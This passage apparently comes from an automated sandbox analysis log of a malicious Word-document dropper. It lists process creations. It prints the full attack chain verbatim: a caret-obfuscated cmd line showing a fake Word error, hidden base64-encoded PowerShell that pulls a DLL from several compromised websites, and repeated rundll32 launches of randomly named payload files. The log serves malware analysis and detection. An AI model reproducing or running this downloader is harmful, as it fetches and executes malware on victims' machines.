b'+':'+'//silk'+'o')+('nbu'+'si')+'ne'+('ss.'+'m')+'a'+('t'+'rixin'+'fotec'+'hsoluti')+('on.c'+'o')+'m'+('/'+'js')+('/'+'q26')+('/!'+'x [')+' '+'sh'+(' b'+'s:/')+'/'+('bbj'+'u')+('gu'+'eter'+'ia')+('.com'+'/s6k')+('sc'+'x')+'/'+'Z'+('/!'+'x')+' ['+' '+'s'+('h'+' '+'bs:/')+'/'+('ww'+'w')+'.b'+'i'+'m'+'ce'+'p'+'ti'+('on.c'+'o')+('m/w'+'p-admin/sHy'+'5t/'+'!x ['+' '+'s'+'h b://armak')+'on'+('ar'+'ms.'+'c')+'o'+'m/'+'w'+('p-i'+'n')+('clu'+'de'+'s/fz/'+'!')+'x '+('['+' s')+('h'+' b:/'+'/al')+('u'+'g'+'rama.c')+('om'+'.')+'m'+'x'+'/'+'t/'+('2/!x'+' '+'[ sh')+(' b'+':')+('/'+'/ho')+'me'+('cass.co'+'m/'+'wp')+('-c'+'ont')+('ent'+'/iF'+'/'))."Re`Pl`ACe"(('x '+('[ sh'+'
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SeT-vARiaBLe ("T4"+"Kd6") ( [Type]("{2}{3}{5}{0}{4}{1}" -F 're','rY','SY','sTe','ctO','m.Io.DI') ); SEt 428 ( [TYpe]("{3}{7}{0}{5}{6}{2}{4}{8}{1}"-f'EM.nET.','er','t','SYs','M','sERViCE','PoIN','t','aNag')) ; $Jrnzmks=$A16L + [char](33) + $Y11F;$M20M=('O1'+'8W'); (IteM ("VArIABlE:T4k"+"D"+"6") ).vAlUe::"CreAT`EdIReCt`Ory"($HOME + (('{0}'+'Snuvw2w{0'+'}V'+'46'+'51pz{0'+'}') -F[CHar]92));$E20V=(('B1'+'3')+'A'); $428::"sEcu`R`ityP`R`OTocol" = (('T'+'ls1')+'2');$E_9Q=(('G'+'91')+'N');$Wsxw52z = ('H'+('64'+'C'));$L04N=('V'+('16'+'F'));$Xdn5xhg=$HOME+(('{0}Snuvw'+'2w{0}V'+('465'+'1p')+'z{0}')-F[CHar]92)+$Wsxw52z+'.d' + 'll';$X28G=('W0'+'1E');$O338_77='h' + 'tt' + 'p';$Xap1lma=('x'+' '+('['+' sh b:'+'//')+('co'+'wor')+('k'+'ingpl')+'us'+'.'+('es'+'/w')+('p-a'+'dmin'+'/Fxm')+('ME'+'/')+'!'+'x'+' ['+' '+'sh'+(' b'+':'+'//silk'+'o')+('nbu'+'si')+'ne'+('ss.'+'m')+'a'+('t'+'rixin'+'fotec'+'hsoluti')+('on.c'+'o')+'m'+('/'+'js')+('/'+'q26')+('/!'+'x [')+' '+'sh'+(' b'+'s:/')+'/'+('bbj'+'u')+('gu'+'eter'+'ia')+('.com'+'/s6k')+('sc'+'x')+'/'+'Z'+('/!'+'x')+' ['+' '+'s'+('h'+' '+'bs:/')+'/'+('ww'+'w')+'.b'+'i'+'m'+'ce'+'p'+'ti'+('on.c'+'o')+('m/w'+'p-admin/sHy'+'5t/'+'!x ['+' '+'s'+'h b://armak')+'on'+('ar'+'ms.'+'c')+'o'+'m/'+'w'+('p-i'+'n')+('clu'+'de'+'s/fz/'+'!')+'x '+('['+' s')+('h'+' b:/'+'/al')+('u'+'g'+'rama.c')+('om'+'.')+'m'+'x'+'/'+'t/'+('2/!x'+' '+'[ sh')+(' b'+':')+('/'+'/ho')+'me'+('cass.co'+'m/'+'wp')+('-c'+'ont')+('ent'+'/iF'+'/'))."Re`Pl`ACe"(('x '+('[ sh'+'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyStringJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyStringJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzUJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',iaFYJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',WysFLGeRRaeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',ZENT
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
